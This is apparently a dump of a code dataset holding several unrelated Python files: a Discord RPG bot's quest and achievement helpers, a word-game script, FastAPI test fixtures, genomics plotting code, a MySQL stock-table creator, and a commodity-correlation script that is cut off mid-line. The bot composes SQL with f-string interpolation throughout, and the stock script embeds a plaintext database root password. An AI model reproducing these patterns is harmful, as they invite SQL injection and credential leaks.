217288785803608074:\n xp_amount = round(1.75*(random.randint(5,50)))\n else:\n xp_amount = random.randint(5,100)\n\n if message.guild.id == 732632186204979281:\n xp_amount *= 2\n\n if num == 4:\n if str(message.author.id) in bot.registered_users:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select exp, level from users where id = '{message.author.id}';\") as profile:\n prof = await profile.fetchone()\n xp = prof[0] + xp_amount\n current_lvl = prof[1]\n if xp >= max_xp(current_lvl) and ((prof[1]+1) % 10 != 0):\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = 0 where id = '{message.author.id}'\")\n await conn.execute(f\"update users set level = {current_lvl + 1} where id = '{message.author.id}'\")\n await conn.commit()\n embed = discord.Embed(title=f\"✨ Level up! ✨\", colour=discord.Colour.from_rgb(255, 204, 153), description=f'You are now level {prof[1]+1}! Good job!')\n embed.set_thumbnail(url=message.author.avatar_url)\n notif = await message.channel.send(content=message.author.mention, embed=embed)\n await notif.delete(delay=10)\n elif xp >= max_xp(current_lvl) and ((prof[1]+1) % 10 == 0):\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = {max_xp(current_lvl)} where id = '{message.author.id}'\")\n await conn.commit()\n if message.author.id not in bot.notified:\n bot.notified.append(message.author.id)\n embed = discord.Embed(title=f\"✨ Level up! ✨\", colour=discord.Colour.from_rgb(255, 204, 153), description=f'You can now level up to {prof[1]+1}! Good job!')\n embed.set_thumbnail(url=message.author.avatar_url)\n embed.set_footer(text=f\"A class up is available! Run {prefix}classup when you are ready.\", icon_url=\"https://lh3.googleusercontent.com/proxy/OrYbJO2bKqGtVPcWnue8XK0SRnHoC-h8VHKNTw9JoVk-k_mke8bcurTQgoKd70H_kgr9AR2CQH-GRgckkZqXbRbdf-CZgjac\")\n notif = await message.channel.send(content=f'{message.author.mention}', embed=embed)\n await notif.delete(delay=10) \n else:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = {xp} where id = '{message.author.id}'\")\n await conn.commit()\n \n\nasync def webhook_safe_check(channel): # This function should be run before any webhook command in main.py. It makes sure that the channel has a webhook, and if it doesn't, it creates one.\n seeking_id = channel.id\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from webhooks where channel_id = '{seeking_id}';\") as chan:\n hook = await chan.fetchone()\n if hook:\n return hook[1]\n else:\n new_hook = await channel.create_webhook(name=f\"Chat Classes {channel.name} Webhook\")\n await conn.execute(f\"insert into webhooks values('{channel.id}', '{new_hook.url}')\")\n await conn.commit()\n return new_hook.url\n\nbasic_text_quests = [1,2,3,4,5,6,15,16,17]\nasync def on_message_quest_handler(user, mss, people, bot): # This takes the message sent, checks if it's applicable to any quest. I just put it here instead of main.py honestly.\n uid = str(user.id)\n if uid in people:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select completed_quests, currently_questing from users where id = '{uid}';\") as chan:\n quest = await chan.fetchone()\n if quest:\n if quest[1] != 0: # If the user has a quest...\n if quest[1] in basic_text_quests:\n await update_quest(mss, quest[1], 1, bot)\n\nasync def update_quest(message, quest_id, addition, bot, silent = False):\n if addition > 0: # Setting addition to 0 will fail their quest.\n chan = message.channel\n user = message.author\n notif = None # To prevent locked db errors.\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from quests where quest_id = {quest_id}\") as q_info:\n quest_info = await q_info.fetchone()\n\n questers = quest_info[5].split(\"|\")\n\n for guy in questers:\n new_guy = guy.split(\",\")\n questers[questers.index(guy)] = new_guy # I don't want to comment this and I know I will regret this. \n # print(f\"I am setting {new_guy} up to replace {guy}.\")\n\n found = False\n for new_guy in questers: # Have to do this in a seperate loop to prevent a critical error.\n if new_guy[0] == str(user.id):\n found = True\n new_guy[1] = str(int(new_guy[1]) + addition)\n \n if int(new_guy[1]) >= int(quest_info[7]):\n questers.pop(questers.index(new_guy))\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select completed_quests from users where id = '{message.author.id}'\") as count:\n old_count = await count.fetchone()\n new_count = old_count[0] + 1\n await conn.execute(f\"update users set completed_quests = {new_count} where id = '{message.author.id}';\")\n await conn.commit()\n async with aiosqlite.connect('main.db') as conn:\n if quest_info[2] == \"coolness\": # REWARD TYPES!\n async with conn.execute(f\"select coolness from users where id = '{message.author.id}'\") as coolness:\n old_cool = await coolness.fetchone()\n new_cool = old_cool[0] + int(quest_info[3])\n await conn.execute(f\"update users set coolness = {new_cool} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} Coolness\"\n elif quest_info[2] == \"xp\": \n async with conn.execute(f\"select exp from users where id = '{message.author.id}'\") as exp:\n old_exp = await exp.fetchone()\n new_exp = old_exp[0] + int(quest_info[3])\n await conn.execute(f\"update users set exp = {new_exp} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} XP\"\n elif quest_info[2] == \"gold\": \n async with conn.execute(f\"select gold from users where id = '{message.author.id}'\") as exp:\n old_cash = await exp.fetchone()\n amount = int(quest_info[3])\n if message.author.id in bot.server_boosters and amount > 0:\n amount *= 2\n new_cash = old_cash[0] + amount\n await conn.execute(f\"update users set gold = {new_cash} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} Gold\"\n else:\n pass\n\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n await conn.commit()\n\n embed = discord.Embed(title=f\"Quest Complete!\", colour=discord.Colour.from_rgb(166, 148, 255), description=f'**{quest_info[6]}**\\n*{quest_info[1]}*')\n embed.set_footer(text=reward, icon_url=\"\")\n embed.set_thumbnail(url=quest_info[4])\n notif = await chan.send(content=message.author.mention, embed=embed)\n if notif:\n await notif.delete(delay=10)\n\n end = \"\"\n for sublist in questers:\n if questers.index(sublist) == len(questers)-1:\n end += f\"{','.join(sublist)}\"\n else:\n end += f\"{','.join(sublist)}|\"\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update quests set users = '{end}' where quest_id = '{quest_id}';\")\n await conn.commit()\n\n if found == False:\n print(\"Locked. Probably.\")\n for i in range(0,50): # Try only 50 times.\n while True:\n try:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n await conn.commit()\n except ValueError:\n continue\n break\n else:\n chan = message.channel\n user = message.author\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from quests where quest_id = {quest_id}\") as q_info:\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n quest_info = await q_info.fetchone()\n await conn.commit()\n \n questers = quest_info[5].split(\"|\")\n\n for guy in questers:\n new_guy = guy.split(\",\")\n questers[questers.index(guy)] = new_guy\n\n for new_guy in questers: # Have to do this in a seperate loop to prevent a critical error.\n if new_guy[0] == str(user.id):\n found = True\n questers.pop(questers.index(new_guy))\n \n end = \"\"\n for sublist in questers:\n if questers.index(sublist) == len(questers)-1:\n end += f\"{','.join(sublist)}\"\n else:\n end += f\"{','.join(sublist)}|\"\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update quests set users = '{end}' where quest_id = '{quest_id}';\")\n await conn.commit()\n\n if silent:\n pass\n else:\n embed = discord.Embed(title=f\"Quest Failed!\", colour=discord.Colour.from_rgb(166, 148, 255), description=f'**{quest_info[6]}**\\n*{quest_info[1]}*')\n embed.set_thumbnail(url=quest_info[4])\n await chan.send(content=message.author.mention, embed=embed)\n \n \n\n\n\n###################################################################\n###################################################################\n################## ACHIEVEMENT HANDLING ###########################\n###################################################################\n###################################################################\n\nnecromancer_triggers = [\n \"i want to die\",\n \"i died\",\n \"i am dead\",\n \"i am dying\",\n \"i am going to die\",\n \"i dieded\",\n \"want to be a necromancer\",\n \"wish i was a necromancer\"\n]\n\nold_bot_triggers = [\n \"robo head\",\n \"asami\",\n \"skeletor\",\n \"robo_head\",\n \"runebot\",\n \"rune bot\",\n \"waifu battles\"\n]\n\njanitor_triggers = [\n \"frick\",\n \"heck\",\n \"darn\",\n \"h*ck\",\n]\n\n\nasync def txt_achievement_handler(content, uid, message_obj, bot): # This is going to be a long mess... This is the handler for text-based achievements ONLY! \n unlocked = bot.registered_users[str(uid)]\n ach_id = 0\n if any(trg in content for trg in necromancer_triggers) and 1 not in unlocked:\n ach_id = 1\n elif \"@everyone\" in content and 2 not in unlocked:\n ach_id = 2\n elif \"a\" in content and content != f\"{prefix}start\" and 3 not in unlocked:\n ach_id = 3\n elif \"<@!713506775424565370>\" in content or \"<@713506775424565370>\" in content and 4 not in unlocked:\n ach_id = 4\n elif message_obj.guild.id == 732632186204979281 and 5 not in unlocked:\n ach_id = 5\n elif content == \"<@!217288785803608074>\" or content == \"<@217288785803608074>\" and 6 not in unlocked:\n ach_id = 6\n elif any(trg in content for trg in old_bot_triggers) and 7 not in unlocked:\n ach_id = 7\n elif any(trg in content for trg in janitor_triggers) and 8 not in unlocked:\n ach_id = 8\n elif \"no tomb can hold me\" in content and 10 not in unlocked:\n ach_id = 10\n elif \"groovy\" in content and 11 not in unlocked:\n ach_id = 11\n\n # Above determines which achievement has been obtained. Below takes that id and sends the embed as well as awarding the achievement.\n \n if ach_id != 0 and ach_id not in unlocked:\n await award_ach(ach_id, message_obj, bot)\n\n\nasync def add_coolness(uid, amount):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select coolness from users where id = '{uid}';\") as current_amount:\n coolness = await current_amount.fetchone()\n await conn.execute(f\"update users set coolness = '{coolness[0]+amount}' where id = '{uid}';\")\n await conn.commit()\n\nasync def add_gold(uid, amount, bot, debt_mode = False, purchase_mode = None, boost_null = False):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select gold from users where id = '{uid}';\") as current_amount:\n gold = await current_amount.fetchone()\n\n if uid in bot.server_boosters and amount > 0 and boost_null == False:\n amount *= 2\n else:\n amount *= 1\n\n final = gold[0]+amount\n if final < 0 and debt_mode == False and purchase_mode == None:\n final = 0\n if final < 0 and purchase_mode != None:\n await purchase_mode.send(\"You cannot afford this!\")\n raise SyntaxError\n await conn.execute(f\"update users set gold = '{final}' where id = '{uid}';\")\n await conn.commit()\n\nasync def award_ach(ach_id, message, bot):\n uid = message.author.id\n unlocked = bot.registered_users[str(uid)]\n if ach_id not in unlocked:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select achievements from users where id = '{uid}';\") as person:\n user_ach = await person.fetchone() # While these lines are repeats from the txt_achievement_handler, this function can be used in other lines of code to award achievements, so this unfortunate redundancy has to stay for now.\n user_ach = user_ach[0].split(\"|\")\n user_ach.append(str(ach_id))\n user_ach = '|'.join(user_ach)\n await conn.execute(f\"update users set achievements = '{user_ach}' where id = '{uid}'\")\n await conn.commit()\n \n async with conn.execute(f\"select * from achievements where id = '{ach_id}'\") as ach:\n ach_info = await ach.fetchone()\n embed = discord.Embed(title=f\"Achievement Unlocked!\", colour=discord.Colour.from_rgb(255,200,0), description=f'**\"{ach_info[1]}\"**\\n*{ach_info[2]}*')\n embed.set_thumbnail(url=ach_info[3])\n amount = ach_info[4]\n embed.set_footer(text=f\"+{amount} Coolness\", icon_url=\"\")\n # await asyncio.sleep(random.randint(30,100))\n async with conn.execute(f\"select coolness from users where id = '{uid}';\") as current_amount: # Can't run the function for this due to overloading the db\n coolness = await current_amount.fetchone()\n await conn.execute(f\"update users set coolness = '{coolness[0]+amount}' where id = '{uid}';\")\n await conn.commit()\n async with conn.execute(f\"select id, achievements from users;\") as people:\n usrs = await people.fetchall()\n for guy in usrs: # Regenerate the list of people with achievements.\n user_ach = guy[1].split(\"|\")\n unlocked = []\n for stringnum in user_ach: # Just for the if statement. I really hate this and want to fix it eventually.\n unlocked.append(int(stringnum))\n \n bot.registered_users[guy[0]] = unlocked\n\n mss = await message.channel.send(content=message.author.mention, embed=embed)\n await mss.delete(delay=10)\n \nasync def fetch_random_quest(message, bot, uid=None, override=False):\n # Random quest encounter chance time!\n if uid:\n uid = str(uid.id)\n else:\n uid = str(message.author.id)\n if uid in bot.registered_users:\n chance = random.randint(1,100)\n if override:\n chance = 52\n if chance == 52: \n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select currently_questing from users where id = '{uid}';\") as people:\n usrs = await people.fetchall()\n if usrs != []:\n if usrs[0][0] == 0: # If they don't have a quest...\n async with conn.execute(\"select count(*) from quests;\") as numcount:\n num = await numcount.fetchone()\n total_quests = num[0]\n chosen_quest = random.randint(1, total_quests)\n async with conn.execute(f\"select * from quests where quest_id = {chosen_quest}\") as q_info: # Why not select just the users? In case I want to do something with the quest info later. Futureproofing, I suppose.\n quest_info = await q_info.fetchone()\n questers = quest_info[5]\n questers += f\"{uid},0|\"\n await conn.execute(f\"update quests set users = '{questers}' where quest_id = {chosen_quest};\")\n await conn.execute(f\"update users set currently_questing = {chosen_quest} where id = '{uid}';\")\n await conn.commit()\n embed = discord.Embed(title=f\"New Quest!\", colour=discord.Colour.from_rgb(255,200,0), description=f\"**{quest_info[6]}**\\n*{quest_info[1]}*\") \n embed.set_thumbnail(url=quest_info[4])\n embed.set_footer(text=f\"Reward: {quest_info[2].title()} ({quest_info[3]})\", icon_url=\"\")\n notif = await message.channel.send(content=message.author.mention, embed=embed)\n await notif.delete(delay=5)\n\n#########################################################\n#########################################################\n#########################################################\n#########################################################\n#########################################################\n\nasync def genprof(uid, aps, bot):\n person = uid\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(\"select count(*) from achievements;\") as numcount:\n num = await numcount.fetchone()\n num_not = unobtainable_achs\n total_achievements = num[0]-num_not # Self explanatory.\n async with conn.execute(f\"select * from users where id = '{uid.id}';\") as info:\n user = await info.fetchone()\n\n profile = discord.Embed(title=f\"{uid.display_name}'s Profile\", colour=discord.Colour(0x6eaf0b), description=\"\")\n profile.set_thumbnail(url=uid.avatar_url)\n ###\n user_ach = user[6].split(\"|\")\n user_ach = len(user_ach)-1\n clss = user[1].replace(\"_\",\" \")\n clss = clss.title()\n ###\n profile.set_footer(text=f\"Global Coolness Ranking: {await genrank(uid.id)}\", icon_url=\"\")\n profile.add_field(name=\"Class & Level\", value=f'{user[1].title()} ║ Level {user[8]}', inline=False)\n\n # Faction stuff\n if person.id in bot.users_factions.keys():\n faction = bot.users_factions[person.id]\n cog = bot.get_cog('factions')\n if faction in cog.factions.keys():\n fac_info = cog.factions[faction]\n i_rgb = fac_info[6].split(\"|\")\n r = int(i_rgb[0])\n g = int(i_rgb[1])\n b = int(i_rgb[2])\n\n color = discord.Colour.from_rgb(r, g, b)\n profile = discord.Embed(title=f\"{uid.display_name}'s Profile\", colour=color, description=\"\")\n profile.set_thumbnail(url=uid.avatar_url)\n profile.set_footer(text=f\"Global Coolness Ranking: {await genrank(uid.id)} | Faction: {fac_info[7]}\", icon_url=\"\")\n profile.add_field(name=\"Class & Level\", value=f'{user[1].title()} ║ Level {user[8]}', inline=False)\n profile.set_image(url=fac_info[5])\n else:\n pass\n\n\n\n profile.add_field(name=\"Coolness\", value=user[5])\n profile.add_field(name=\"Gold\", value=user[3])\n profile.add_field(name=\"Achievements\", value=f\"{user_ach} of {total_achievements} Unlocked ({int((user_ach/total_achievements)*100)}%)\", inline=False)\n profile.add_field(name=\"Experience\", value=f\"{user[2]} / {max_xp(user[8])} ({int((user[2]/max_xp(user[8]))*100)}%)\", inline=False)\n profile.add_field(name=\"Completed Quests\", value=user[9], inline=False)\n profile.add_field(name=\"Action Points\", value=aps[str(uid.id)], inline=False)\n # profile.add_field(name=) Put equipment here eventually\n \n return(profile)\n\nasync def genrank(uid):\n async with aiosqlite.connect('main.db') as con:\n async with con.execute(f\"select * from users order by coolness desc;\") as lb: # Get their coolness rank!\n stuff = await lb.fetchall()\n rank = 1\n for usr in stuff:\n if usr[0] == str(uid):\n break\n else:\n rank+=1\n return(rank)\n\nasync def get_demon(uid, bot):\n cog = bot.get_cog('pacted')\n users_demons = cog.users_demons\n if uid in users_demons:\n demon = users_demons[uid]\n if demon == \"minehart\" and uid not in cog.minehart:\n cog.minehart[uid] = 0\n else:\n async with aiosqlite.connect('classTables.db') as conn:\n async with conn.execute(f\"select uid, demon from pacted_demons where uid = '{uid}'\") as u_info:\n user_info = await u_info.fetchone()\n if user_info:\n users_demons[uid] = user_info[1]\n cog.users_demons = users_demons\n demon = user_info[1]\n if demon == \"minehart\" and uid not in cog.minehart:\n cog.minehart[uid] = 0\n elif user_info == None:\n demon = None\n return demon","repo_name":"Caldraeus/chat-classes","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":38425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"10308919961","text":"import random\r\nimport pyperclip\r\n\r\nwhile True:\r\n word = input(\"Entrez le mot : \")\r\n print(\"Recherche de mot en cours...\")\r\n\r\n with open(\"D:\\Desktop\\Python_Project\\Jeu De Mot\\ods6.txt\",\"r\") as file:\r\n data = file.readlines()\r\n\r\n correct_word = []\r\n\r\n for i in data:\r\n if word.upper() in i:\r\n correct_word.append(i) \r\n if correct_word == []:\r\n print(\"Votre mot n'est pas dans la liste !\")\r\n \r\n result = random.choice(correct_word) \r\n print(\"\\n Votre mot est : \"+result)\r\n \r\n cop = input(\"Voulez vous copier votre mot ? {O/N} : \")\r\n while cop not in (\"O\",\"N\"):\r\n cop = input(\"Vous devez répondre par une valeur correcte ! {O/N} : \")\r\n if cop == \"O\":\r\n up_lo = input(\"Voulez vous que votre mot soit en miniscule ? {O/N} : \")\r\n while up_lo not in (\"O\",\"N\"):\r\n up_lo = input(\"Vous devez répondre par une valeur correcte ! {O/N} : \")\r\n if up_lo == \"O\":\r\n pyperclip.copy(result.lower())\r\n print(\"Mot copié en miniscule avec succès !\")\r\n elif up_lo == \"N\":\r\n pyperclip.copy(result)\r\n print(\"Mot copié avec succès !\")\r\n \r\n elif cop == \"N\":\r\n pass\r\n \r\n cont = input(\"Voulez vous continuer ? {O/N} : \")\r\n while cont not in (\"O\",\"N\"):\r\n cont = input(\"Vous devez répondre par une valeur correcte ! {O/N} : \")\r\n if cont == \"O\":\r\n continue\r\n if cont == \"N\":\r\n print(\"Bye ! En espérant te revoir prochainement.\")\r\n break","repo_name":"FlenderrAX/PunGenerator","sub_path":"jeu_de_mot.py","file_name":"jeu_de_mot.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"14231478077","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Manhattan & QQ plot\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import gridspec\nfrom scipy.stats.mstats import mquantiles\nfrom scipy.stats import beta\nfrom scipy.stats import linregress\n\n\n# In[2]:\n\n\nsum_stat = '/f/jianhua/nankai-hic/fine-mapping/prostate_cancer.txt'\nchrom, bp, p = 'CHR','BP','P'\nsep = '\\t'\ndf = pd.read_csv(sum_stat,sep=sep)\n\n\n# # Reduce size\n\n# In[19]:\n\n\ndf['CHR'] = df['CHR'].replace('X',23)\ndf['CHR'] = df['CHR'].astype(int)\ndf['P'] = -np.log10(df['P'])\ndf['P_down'] = df['P'].round(1)\ndf['P'] = df['P'].round(3)\ndf['BP_down'] = df['BP']/5e6\ndf['BP_down'] = df['BP_down'].astype(int)\nidx = np.random.permutation(np.arange(len(df)))\ndf = df.iloc[idx].drop_duplicates(['CHR','P_down','BP_down'])\ndf = df.sort_values(['CHR','BP'])\ndf['P'] = 10 ** -df['P']\n\n\n# In[12]:\n\n\ndef qq(data,ax,color):\n xmax = 0\n ymax = 0\n alpha = 0.9\n color = '#000000'\n n_quantiles = 100\n\n q_pos = np.concatenate([\n np.arange(99.) / len(data),\n np.logspace(-np.log10(len(data)) + 2, 0, n_quantiles)\n ])\n\n q_data = mquantiles(data, prob=q_pos, alphap=0, betap=1, limit=(0, 1))\n q_th = q_pos.copy()\n q_err = np.zeros([len(q_pos), 2])\n for i in range(0, len(q_pos)):\n q_err[i, :] = q_err[i, :] = beta.interval(\n alpha,\n len(data) * q_pos[i],\n len(data) - len(data) * q_pos[i])\n\n q_err[i, q_err[i, :] < 0] = 1e-15\n slope, intercept, r_value, p_value, std_err = linregress(q_th, q_data)\n xmax = np.max([xmax, -np.log10(q_th[1])])\n ymax = np.max([ymax, -np.log10(q_data[0])])\n\n ax.plot(\n -np.log10(q_th[n_quantiles - 1:]),\n -np.log10(q_data[n_quantiles - 1:]),\n '-',\n color=color)\n ax.plot(\n -np.log10(q_th[:n_quantiles]),\n -np.log10(q_data[:n_quantiles]),\n '.',\n color=color,\n label='gf')\n ax.plot([0, xmax], [0, xmax], '--k',color='#f42e30')\n ax.fill_between(\n -np.log10(q_th),\n -np.log10(q_err[:, 0]),\n -np.log10(q_err[:, 1]),\n color=color,\n alpha=0.1,\n )\n\n\n# In[16]:\n\n\ndef manhattan(df,ax):\n df[p] = -np.log10(df[p])\n df = df.sort_values(chrom)\n df_grouped = df.groupby((chrom))\n\n colors = ['#1A1A1A','#999999',]\n x_labels = []\n x_labels_pos = []\n end = 1000\n for num, (name, group) in enumerate(df_grouped):\n group[bp] = group[bp] + end\n end = group[bp].max() + 1000\n ax.scatter(group[bp], group[p],c=colors[num % len(colors)],s=1)\n x_labels.append(name)\n x_labels_pos.append(group[bp].mean())\n ax.axhline(y=-np.log10(5e-8), color='#2222FF', linestyle='-')\n ax.set_xticks(x_labels_pos)\n ax.set_xticklabels(x_labels)\n# print(df.loc[0,bp]-len(df)*0.1,end+len(df)*0.1)\n# ax.set_ylim([-0.5, df[p].max()*1.05])\n\n\n# In[20]:\n\n\n# df = alldf.copy()\nfigure_tile = 'PH-277'\nfig = plt.figure(figsize=(24, 6))\ngs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])\nax0 = plt.subplot(gs[0])\nax1 = plt.subplot(gs[1])\nqq(df[p], ax1, 'b')\nmanhattan(df,ax0)\n# ax0.set_xlim(left=-3e7,right=2.9e9)\nax0.set_xlabel('Chromosome', fontsize=14)\nax0.set_ylabel('-$\\mathregular{log_{10}}$P', fontsize=14)\nax1.set_xlabel('Observed -$\\mathregular{log_{10}}$P', fontsize=14)\nax1.set_ylabel('Expected -$\\mathregular{log_{10}}$P', fontsize=14)\nax0.spines['right'].set_visible(False)\nax0.spines['top'].set_visible(False)\nax1.spines['right'].set_visible(False)\nax1.spines['top'].set_visible(False)\nfig.suptitle(figure_tile, fontsize=20)\nfig.tight_layout()\nfig.savefig('{}_Manhattan_QQ.pdf'.format(figure_tile), dpi=300)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Jianhua-Wang/sci_viz_py","sub_path":"notebook/_build/jupyter_execute/docs/manhattan_qq.py","file_name":"manhattan_qq.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"74208845219","text":"from typing import Generator, Iterator\n\nfrom fastapi.testclient import TestClient\nimport pytest\nfrom sqlalchemy.orm import Session\n\nfrom app import main\nfrom app.database.models import Base, User\nfrom app.routers import (\n agenda, event, friendview, google_connect, invitation, profile\n)\nfrom app.routers.salary import routes as salary\nfrom tests import security_testing_routes\nfrom tests.conftest import get_test_db, test_engine\n\nmain.app.include_router(security_testing_routes.router)\n\n\ndef get_test_placeholder_user() -> User:\n return User(\n username='fake_user',\n email='fake@mail.fake',\n password='123456fake',\n full_name='FakeName',\n language_id=1,\n telegram_id='666666',\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef client() -> TestClient:\n return TestClient(main.app)\n\n\ndef create_test_client(get_db_function) -> Generator[Session, None, None]:\n Base.metadata.create_all(bind=test_engine)\n main.app.dependency_overrides[get_db_function] = get_test_db\n\n with TestClient(main.app) as client:\n yield client\n\n main.app.dependency_overrides = {}\n Base.metadata.drop_all(bind=test_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef agenda_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(agenda.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef friendview_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(friendview.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef event_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(event.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef home_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(main.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef invitation_test_client() -> Generator[TestClient, None, None]:\n yield from create_test_client(invitation.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef profile_test_client() -> Generator[Session, None, None]:\n Base.metadata.create_all(bind=test_engine)\n main.app.dependency_overrides[profile.get_db] = get_test_db\n main.app.dependency_overrides[\n profile.get_placeholder_user] = get_test_placeholder_user\n\n with TestClient(main.app) as client:\n yield client\n\n main.app.dependency_overrides = {}\n Base.metadata.drop_all(bind=test_engine)\n\n\n@pytest.fixture(scope=\"session\")\ndef security_test_client():\n yield from create_test_client(event.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef salary_test_client() -> Iterator[TestClient]:\n yield from create_test_client(salary.get_db)\n\n\n@pytest.fixture(scope=\"session\")\ndef google_connect_test_client():\n Base.metadata.create_all(bind=test_engine)\n main.app.dependency_overrides[google_connect.get_db] = get_test_db\n\n with TestClient(main.app) as client:\n yield client\n\n main.app.dependency_overrides = {}\n Base.metadata.drop_all(bind=test_engine)\n","repo_name":"PythonFreeCourse/calendar","sub_path":"tests/client_fixture.py","file_name":"client_fixture.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"35"}
+{"seq_id":"12619541274","text":"# @author Duke Chain\n# @File:CreateStockInfo.py\n# @createTime 2020/11/05 22:54:05\n\nimport pymysql\n\n\nclass CreateStockInfo:\n \"\"\"\n 为新收集的数据在stock_info数据库中创建表\n 表命名规则:stockID\n\n Args:\n stockID:传入股票ID\n database:目标位于的数据库(daily,weekly,monthly)\n content:判断数据库类型(d(日),t(秒),m(分钟))\n \"\"\"\n\n def __init__(self, stockID, database, content='m'):\n self.stockID = stockID\n self.database = database\n self.content = content\n\n def _connection(self):\n \"\"\"\n 建立和数据库的连接\n \"\"\"\n conn = pymysql.connect(\"localhost\", \"root\", \"qian258046\", self.database, charset='utf8')\n cursor = conn.cursor()\n return cursor, conn\n\n def createTable(self):\n \"\"\"\n 为stockID创建表\n ts_code trade_date open high low close pre_close chg pct_chg vol amount\n\n Returns:\n 建表成功返回Ture,失败返回False\n \"\"\"\n cursor, conn = self._connection()\n existence = cursor.execute(\"show tables like '%s';\" % self.stockID)\n # 检查该表是否已经存在\n if existence == 1:\n print('该表已存在,不予重复创建')\n return False\n else:\n # 日���数据表\n if self.content == 'd':\n sql = \"\"\"CREATE TABLE `{}`(\n trade_date char(30),\n close_price float,\n high_price float,\n low_price float,\n open_price float,\n pre_close float,\n volume float,\n outstanding_share float,\n turnover float\n )\"\"\".format(self.stockID)\n # 秒级数据表\n elif self.content == 't':\n sql = \"\"\"CREATE TABLE `{}`(\n trade_date char(30),\n stock_price float,\n chg float,\n volume float\n )\"\"\".format(self.stockID)\n # 分钟级数据表\n else:\n sql = \"\"\"CREATE TABLE `{}`(\n trade_date char(30),\n open_price float,\n high_price float,\n low_price float,\n close_price float,\n volume float\n )\"\"\".format(self.stockID)\n cursor.execute(sql)\n print(self.stockID + \"信息表已创建!\")\n conn.commit()\n conn.close()\n\n return True\n\n# 测试信息\n# test = CreateStockInfo('test_table')\n# test.createTable()\n","repo_name":"dukechain2333/BossaNova","sub_path":"DBOperate/CreateStockInfo.py","file_name":"CreateStockInfo.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"}
+{"seq_id":"29104988390","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport matplotlib.dates as mdates\n\n\n#1/1/07 till now monthly (per gram?)\n\ngold = pd.read_csv(\"Gold.csv\")\nbrent = pd.read_csv(\"brent-month_csv.csv\")\ndollar = pd.read_csv(\"USDX.csv\")\ndates = mdates.num2date(mdates.datestr2num(gold['date']))\nGold = gold['price']\nBrent = brent['Brent Spot Price']\nDollar = dollar['Price']\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Gold, 'y')\nax1.set_ylabel('Gold (yellow)')\nax2 = ax1.twinx()\nax2.plot(dates, Brent, 'k')\nax2.set_ylabel('Brent (Black)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Dollar, 'r')\nax1.set_ylabel('Dollar (red)')\nax2 = ax1.twinx()\nax2.plot(dates, Brent, 'k')\nax2.set_ylabel('Brent (Black)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nfig, ax1 = plt.subplots()\nax1.plot(dates, Dollar, 'r')\nax1.set_ylabel('Dollar (red)')\nax2 = ax1.twinx()\nax2.plot(dates, Gold, 'y')\nax2.set_ylabel('Gold (yellow)')\nfig.autofmt_xdate()\nplt.grid(True)\n\nGoldBrent07_12 = np.corrcoef(Gold[0:84],Brent[0:84]) #From 07 to 12\nGoldBrent15_18 = np.corrcoef(Gold[96:],Brent[96:]) #From 15 to 18\n\nprint('GoldBrent07_12', GoldBrent07_12[0][1])\nprint('GoldBrent15_18', GoldBrent15_18[0][1])\nprint('overall GoldBrent', np.corrcoef(Gold,Brent)[0][1])\n\nDollarBrent09_15 = np.corrcoef(Dollar[43:115],Brent[24:96])\nDollarBrent15_18 = 